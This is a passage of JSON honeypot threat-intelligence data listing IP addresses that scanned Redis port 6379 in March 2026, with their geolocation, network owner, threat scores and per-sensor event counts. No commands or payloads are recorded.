        "recency_factor": 0.93
      },
      "reputation_metrics": {
        "total_events_30d": 49,
        "days_active_30d": 27,
        "ports_targeted_30d": 7,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-03T06:51:05.347000+00:00",
        "last_seen_30d": "2026-03-29T07:53:06.908000+00:00",
        "days_since_last_seen": 2
      },
      "honeypot_breakdown_30d": {
        "Suricata": 33,
        "Honeytrap": 13,
        "Redishoneypot": 3
      }
    },
    "20.175.198.186": {
      "attack_count": 9,
      "first_seen": "2026-03-14T04:17:16.000Z",
      "last_seen": "2026-03-14T04:18:19.576Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Canada",
      "country_code": "CA",
      "city": "Toronto",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 8.2,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 6.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.43
      },
      "reputation_metrics": {
        "total_events_30d": 4,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-14T04:17:16+00:00",
        "last_seen_30d": "2026-03-14T04:18:19.576000+00:00",
        "days_since_last_seen": 17
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 3,
        "Suricata": 1
      }
    },
    "205.210.31.69": {
      "attack_count": 9,
      "first_seen": "2026-03-31T21:29:13.000Z",
      "last_seen": "2026-03-31T21:30:46.048Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 396982,
      "as_org": "Google LLC",
      "threat_score": 92.0,
      "threat_level": "critical",
      "score_components": {
        "frequency": 22.0,
        "persistence": 25,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 159,
        "days_active_30d": 30,
        "ports_targeted_30d": 47,
        "honeypots_triggered_30d": 9,
        "first_seen_30d": "2026-03-02T02:33:57+00:00",
        "last_seen_30d": "2026-03-31T21:30:46.048000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 112,
        "Honeytrap": 33,
        "Cowrie": 6,
        "Redishoneypot": 3,
        "CitrixHoneypot": 1,
        "Dicompot": 1,
        "Dionaea": 1,
        "Sentrypeer": 1,
        "Tanner": 1
      }
    },
    "205.210.31.85": {
      "attack_count": 9,
      "first_seen": "2026-03-09T04:22:24.000Z",
      "last_seen": "2026-03-09T04:24:05.174Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 396982,
      "as_org": "Google LLC",
      "threat_score": 86.7,
      "threat_level": "critical",
      "score_components": {
        "frequency": 21.7,
        "persistence": 25,
        "diversity": 20,
        "spread": 20,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 147,
        "days_active_30d": 30,
        "ports_targeted_30d": 44,
        "honeypots_triggered_30d": 4,
        "first_seen_30d": "2026-03-02T09:08:37+00:00",
        "last_seen_30d": "2026-03-31T10:30:02.319000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 100,
        "Honeytrap": 43,
        "Redishoneypot": 3,
        "Dionaea": 1
      }
    },
    "192.241.150.153": {
      "attack_count": 8,
      "first_seen": "2026-03-09T04:26:48.000Z",
      "last_seen": "2026-03-09T06:24:04.365Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "North Bergen",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 18.9,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 30,
        "persistence": 0.8,
        "diversity": 20,
        "spread": 20,
        "recency_factor": 0.27
      },
      "reputation_metrics": {
        "total_events_30d": 3813,
        "days_active_30d": 1,
        "ports_targeted_30d": 1903,
        "honeypots_triggered_30d": 4,
        "first_seen_30d": "2026-03-09T03:50:24+00:00",
        "last_seen_30d": "2026-03-09T06:29:56.729000+00:00",
        "days_since_last_seen": 22
      },
      "honeypot_breakdown_30d": {
        "Suricata": 3744,
        "Honeytrap": 65,
        "Miniprint": 3,
        "Tanner": 1
      }
    },
    "3.144.44.57": {
      "attack_count": 8,
      "first_seen": "2026-03-16T02:20:09.000Z",
      "last_seen": "2026-03-16T02:21:10.586Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Columbus",
      "asn": 16509,
      "as_org": "Amazon.com, Inc.",
      "threat_score": 35.2,
      "threat_level": "low",
      "score_components": {
        "frequency": 24.6,
        "persistence": 0.8,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.5
      },
      "reputation_metrics": {
        "total_events_30d": 291,
        "days_active_30d": 1,
        "ports_targeted_30d": 159,
        "honeypots_triggered_30d": 7,
        "first_seen_30d": "2026-03-16T02:20:09+00:00",
        "last_seen_30d": "2026-03-16T02:30:18.930000+00:00",
        "days_since_last_seen": 15
      },
      "honeypot_breakdown_30d": {
        "Suricata": 161,
        "Honeytrap": 110,
        "Dionaea": 9,
        "Cowrie": 4,
        "Miniprint": 3,
        "Adbhoney": 2,
        "Redishoneypot": 2
      }
    },
    "4.147.233.166": {
      "attack_count": 8,
      "first_seen": "2026-03-21T18:33:25.000Z",
      "last_seen": "2026-03-21T18:34:28.606Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Australia",
      "country_code": "AU",
      "city": "Sydney",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 12.6,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 6.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.67
      },
      "reputation_metrics": {
        "total_events_30d": 4,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-21T18:33:25+00:00",
        "last_seen_30d": "2026-03-21T18:34:28.606000+00:00",
        "days_since_last_seen": 10
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 3,
        "Suricata": 1
      }
    },
    "66.132.186.241": {
      "attack_count": 7,
      "first_seen": "2026-03-29T17:06:22.000Z",
      "last_seen": "2026-03-29T17:07:24.125Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 398324,
      "as_org": "Censys, Inc.",
      "threat_score": 46.8,
      "threat_level": "medium",
      "score_components": {
        "frequency": 13.4,
        "persistence": 8.3,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 22,
        "days_active_30d": 10,
        "ports_targeted_30d": 22,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-22T10:40:34.080000+00:00",
        "last_seen_30d": "2026-03-31T11:27:30.599000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 22
      }
    },
    "101.42.101.250": {
      "attack_count": 6,
      "first_seen": "2026-03-02T11:26:12.000Z",
      "last_seen": "2026-03-02T11:27:19.434Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Beijing",
      "asn": 45090,
      "as_org": "Shenzhen Tencent Computer Systems Company Limited",
      "threat_score": 0.8,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.1
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T11:27:19.434000+00:00",
        "last_seen_30d": "2026-03-02T11:27:19.434000+00:00",
        "days_since_last_seen": 29
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "106.75.176.89": {
      "attack_count": 5,
      "first_seen": "2026-03-12T05:02:49.000Z",
      "last_seen": "2026-03-12T05:03:56.757Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 58466,
      "as_org": "CHINANET Guangdong province network",
      "threat_score": 15.7,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 17.0,
        "persistence": 0.8,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 0.37
      },
      "reputation_metrics": {
        "total_events_30d": 50,
        "days_active_30d": 1,
        "ports_targeted_30d": 50,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-12T05:03:21.878000+00:00",
        "last_seen_30d": "2026-03-12T05:08:53.347000+00:00",
        "days_since_last_seen": 19
      },
      "honeypot_breakdown_30d": {
        "Suricata": 50
      }
    },
    "110.42.3.79": {
      "attack_count": 5,
      "first_seen": "2026-03-15T20:31:10.000Z",
      "last_seen": "2026-03-15T20:32:13.367Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 136188,
      "as_org": "NINGBO, ZHEJIANG Province, P.R.China.",
      "threat_score": 3.7,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.47
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-15T20:32:13.367000+00:00",
        "last_seen_30d": "2026-03-15T20:32:13.367000+00:00",
        "days_since_last_seen": 16
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "119.164.104.43": {
      "attack_count": 5,
      "first_seen": "2026-03-25T03:30:10.000Z",
      "last_seen": "2026-03-25T03:31:19.454Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Jinan",
      "asn": 4837,
      "as_org": "CHINA UNICOM China169 Backbone",
      "threat_score": 6.3,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.8
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-25T03:31:19.454000+00:00",
        "last_seen_30d": "2026-03-25T03:31:19.454000+00:00",
        "days_since_last_seen": 6
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "120.48.134.61": {
      "attack_count": 5,
      "first_seen": "2026-03-31T05:12:36.000Z",
      "last_seen": "2026-03-31T05:13:43.253Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Beijing",
      "asn": 38365,
      "as_org": "Beijing Baidu Netcom Science and Technology Co., Ltd.",
      "threat_score": 7.8,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-31T05:13:43.253000+00:00",
        "last_seen_30d": "2026-03-31T05:13:43.253000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "139.212.70.177": {
      "attack_count": 5,
      "first_seen": "2026-03-31T23:18:19.000Z",
      "last_seen": "2026-03-31T23:19:29.976Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 4837,
      "as_org": "CHINA UNICOM China169 Backbone",
      "threat_score": 7.8,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-31T23:19:29.976000+00:00",
        "last_seen_30d": "2026-03-31T23:19:29.976000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "14.103.198.15": {
      "attack_count": 5,
      "first_seen": "2026-03-20T04:40:01.000Z",
      "last_seen": "2026-03-20T04:41:12.487Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 4811,
      "as_org": "China Telecom Group",
      "threat_score": 5.0,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.63
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-20T04:41:12.487000+00:00",
        "last_seen_30d": "2026-03-20T04:41:12.487000+00:00",
        "days_since_last_seen": 11
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "143.42.1.128": {
      "attack_count": 5,
      "first_seen": "2026-03-12T12:39:30.000Z",
      "last_seen": "2026-03-12T12:40:40.956Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Cedar Knolls",
      "asn": 63949,
      "as_org": "Akamai Connected Cloud",
      "threat_score": 72.5,
      "threat_level": "high",
      "score_components": {
        "frequency": 22.5,
        "persistence": 25,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 179,
        "days_active_30d": 30,
        "ports_targeted_30d": 165,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T00:04:52.659000+00:00",
        "last_seen_30d": "2026-03-31T20:53:21.177000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 179
      }
    },
    "147.182.183.18": {
      "attack_count": 5,
      "first_seen": "2026-03-20T02:21:21.000Z",
      "last_seen": "2026-03-20T02:22:59.306Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "North Bergen",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 24.9,
      "threat_level": "low",
      "score_components": {
        "frequency": 13.4,
        "persistence": 0.8,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 0.63
      },
      "reputation_metrics": {
        "total_events_30d": 22,
        "days_active_30d": 1,
        "ports_targeted_30d": 22,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-20T02:22:59.306000+00:00",
        "last_seen_30d": "2026-03-20T23:17:20.727000+00:00",
        "days_since_last_seen": 11
      },
      "honeypot_breakdown_30d": {
        "Suricata": 22
      }
    },
    "152.89.37.189": {
      "attack_count": 5,
      "first_seen": "2026-03-19T05:45:08.000Z",
      "last_seen": "2026-03-19T05:46:17.018Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "T\u00fcrkiye",
      "country_code": "TR",
      "city": null,
      "asn": 42807,
      "as_org": "Cizgi Telekomunikasyon Anonim Sirketi",
      "threat_score": 4.7,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.6
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-19T05:46:17.018000+00:00",
        "last_seen_30d": "2026-03-19T05:46:17.018000+00:00",
        "days_since_last_seen": 12
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "167.248.133.118": {
      "attack_count": 5,
      "first_seen": "2026-03-08T13:10:10.000Z",
      "last_seen": "2026-03-08T13:11:47.792Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 398324,
      "as_org": "Censys, Inc.",
      "threat_score": 53.8,
      "threat_level": "medium",
      "score_components": {
        "frequency": 30,
        "persistence": 18.3,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 0.73
      },
      "reputation_metrics": {
        "total_events_30d": 1034,
        "days_active_30d": 22,
        "ports_targeted_30d": 932,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T00:15:33.655000+00:00",
        "last_seen_30d": "2026-03-23T20:25:09.577000+00:00",
        "days_since_last_seen": 8
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1034
      }
    },
    "167.94.138.139": {
      "attack_count": 5,
      "first_seen": "2026-03-05T15:10:57.000Z",
      "last_seen": "2026-03-05T15:11:59.165Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 398324,
      "as_org": "Censys, Inc.",
      "threat_score": 40.2,
      "threat_level": "medium",
      "score_components": {
        "frequency": 18.6,
        "persistence": 16.7,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 0.67
      },
      "reputation_metrics": {
        "total_events_30d": 72,
        "days_active_30d": 20,
        "ports_targeted_30d": 49,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T12:26:39.687000+00:00",
        "last_seen_30d": "2026-03-21T19:22:49.113000+00:00",
        "days_since_last_seen": 10
      },
      "honeypot_breakdown_30d": {
        "Suricata": 72
      }
    },
    "172.238.160.104": {
      "attack_count": 5,
      "first_seen": "2026-03-07T12:35:43.000Z",
      "last_seen": "2026-03-07T12:36:50.093Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Chicago",
      "asn": 63949,
      "as_org": "Akamai Connected Cloud",
      "threat_score": 72.4,
      "threat_level": "high",
      "score_components": {
        "frequency": 22.4,
        "persistence": 25,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 174,
        "days_active_30d": 30,
        "ports_targeted_30d": 163,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T03:39:10.170000+00:00",
        "last_seen_30d": "2026-03-31T17:00:25.064000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 174
      }
    },
    "186.3.217.69": {
      "attack_count": 5,
      "first_seen": "2026-03-31T07:30:16.000Z",
      "last_seen": "2026-03-31T07:31:23.172Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Ecuador",
      "country_code": "EC",
      "city": "Guayaquil",
      "asn": 27947,
      "as_org": "Telconet S.A",
      "threat_score": 22.9,
      "threat_level": "low",
      "score_components": {
        "frequency": 6.0,
        "persistence": 5.8,
        "diversity": 6,
        "spread": 5,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 4,
        "days_active_30d": 7,
        "ports_targeted_30d": 3,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-25T06:55:53.927000+00:00",
        "last_seen_30d": "2026-03-31T07:31:23.172000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 4
      }
    },
    "209.38.81.211": {
      "attack_count": 5,
      "first_seen": "2026-03-30T08:48:35.000Z",
      "last_seen": "2026-03-30T08:49:43.512Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Australia",
      "country_code": "AU",
      "city": "Sydney",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 41.9,
      "threat_level": "medium",
      "score_components": {
        "frequency": 17.5,
        "persistence": 0.8,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 0.97
      },
      "reputation_metrics": {
        "total_events_30d": 56,
        "days_active_30d": 1,
        "ports_targeted_30d": 56,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-30T08:49:34.522000+00:00",
        "last_seen_30d": "2026-03-30T08:50:15.407000+00:00",
        "days_since_last_seen": 1
      },
      "honeypot_breakdown_30d": {
        "Suricata": 56
      }
    },
    "37.27.201.67": {
      "attack_count": 5,
      "first_seen": "2026-03-27T16:00:10.000Z",
      "last_seen": "2026-03-27T16:01:16.118Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Finland",
      "country_code": "FI",
      "city": "Helsinki",
      "asn": 24940,
      "as_org": "Hetzner Online GmbH",
      "threat_score": 6.8,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.87
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-27T16:01:16.118000+00:00",
        "last_seen_30d": "2026-03-27T16:01:16.118000+00:00",
        "days_since_last_seen": 4
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "39.108.96.168": {
      "attack_count": 5,
      "first_seen": "2026-03-28T06:41:04.000Z",
      "last_seen": "2026-03-28T06:42:05.553Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Shenzhen",
      "asn": 37963,
      "as_org": "Hangzhou Alibaba Advertising Co.,Ltd.",
      "threat_score": 7.1,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.9
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-28T06:42:05.553000+00:00",
        "last_seen_30d": "2026-03-28T06:42:05.553000+00:00",
        "days_since_last_seen": 3
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "48.211.228.224": {
      "attack_count": 5,
      "first_seen": "2026-03-16T13:46:08.000Z",
      "last_seen": "2026-03-16T13:47:47.675Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Boydton",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 3.9,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.5
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-16T13:47:47.675000+00:00",
        "last_seen_30d": "2026-03-16T13:47:47.675000+00:00",
        "days_since_last_seen": 15
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "65.49.1.84": {
      "attack_count": 5,
      "first_seen": "2026-03-03T09:26:36.000Z",
      "last_seen": "2026-03-03T09:27:40.736Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 6939,
      "as_org": "Hurricane Electric LLC",
      "threat_score": 80.1,
      "threat_level": "critical",
      "score_components": {
        "frequency": 15.1,
        "persistence": 25,
        "diversity": 20,
        "spread": 20,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 32,
        "days_active_30d": 30,
        "ports_targeted_30d": 15,
        "honeypots_triggered_30d": 4,
        "first_seen_30d": "2026-03-02T06:39:35.612000+00:00",
        "last_seen_30d": "2026-03-31T01:09:38.478000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 29,
        "Ciscoasa": 1,
        "H0neytr4p": 1,
        "Honeytrap": 1
      }
    },
    "8.138.57.177": {
      "attack_count": 5,
      "first_seen": "2026-03-28T08:18:38.000Z",
      "last_seen": "2026-03-28T08:19:43.819Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Guangzhou",
      "asn": 37963,
      "as_org": "Hangzhou Alibaba Advertising Co.,Ltd.",
      "threat_score": 7.1,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.9
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-28T08:19:43.819000+00:00",
        "last_seen_30d": "2026-03-28T08:19:43.819000+00:00",
        "days_since_last_seen": 3
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "81.71.51.170": {
      "attack_count": 5,
      "first_seen": "2026-03-31T04:00:24.000Z",
      "last_seen": "2026-03-31T04:01:28.234Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Guangzhou",
      "asn": 45090,
      "as_org": "Shenzhen Tencent Computer Systems Company Limited",
      "threat_score": 7.8,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-31T04:01:28.234000+00:00",
        "last_seen_30d": "2026-03-31T04:01:28.234000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "91.230.168.77": {
      "attack_count": 5,
      "first_seen": "2026-03-14T15:24:28.000Z",
      "last_seen": "2026-03-14T15:25:30.623Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Hillsboro",
      "asn": 213412,
      "as_org": "ONYPHE SAS",
      "threat_score": 89.1,
      "threat_level": "critical",
      "score_components": {
        "frequency": 24.1,
        "persistence": 25,
        "diversity": 20,
        "spread": 20,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 256,
        "days_active_30d": 30,
        "ports_targeted_30d": 162,
        "honeypots_triggered_30d": 4,
        "first_seen_30d": "2026-03-02T06:04:41.425000+00:00",
        "last_seen_30d": "2026-03-31T21:58:18.283000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 194,
        "Honeytrap": 60,
        "Ciscoasa": 1,
        "Dionaea": 1
      }
    },
    "185.180.141.39": {
      "attack_count": 4,
      "first_seen": "2026-03-02T07:14:36.000Z",
      "last_seen": "2026-03-02T07:15:41.484Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Portugal",
      "country_code": "PT",
      "city": null,
      "asn": 21859,
      "as_org": "Zenlayer Inc",
      "threat_score": 75.8,
      "threat_level": "high",
      "score_components": {
        "frequency": 17.9,
        "persistence": 23.3,
        "diversity": 20,
        "spread": 20,
        "recency_factor": 0.93
      },
      "reputation_metrics": {
        "total_events_30d": 61,
        "days_active_30d": 28,
        "ports_targeted_30d": 20,
        "honeypots_triggered_30d": 4,
        "first_seen_30d": "2026-03-02T07:15:41.484000+00:00",
        "last_seen_30d": "2026-03-29T02:42:10.569000+00:00",
        "days_since_last_seen": 2
      },
      "honeypot_breakdown_30d": {
        "Suricata": 42,
        "Honeytrap": 17,
        "H0neytr4p": 1,
        "Sentrypeer": 1
      }
    },
    "64.62.156.48": {
      "attack_count": 4,
      "first_seen": "2026-03-23T11:55:30.000Z",
      "last_seen": "2026-03-23T11:56:33.308Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Minneapolis",
      "asn": 6939,
      "as_org": "Hurricane Electric LLC",
      "threat_score": 67.4,
      "threat_level": "high",
      "score_components": {
        "frequency": 13.2,
        "persistence": 24.2,
        "diversity": 20,
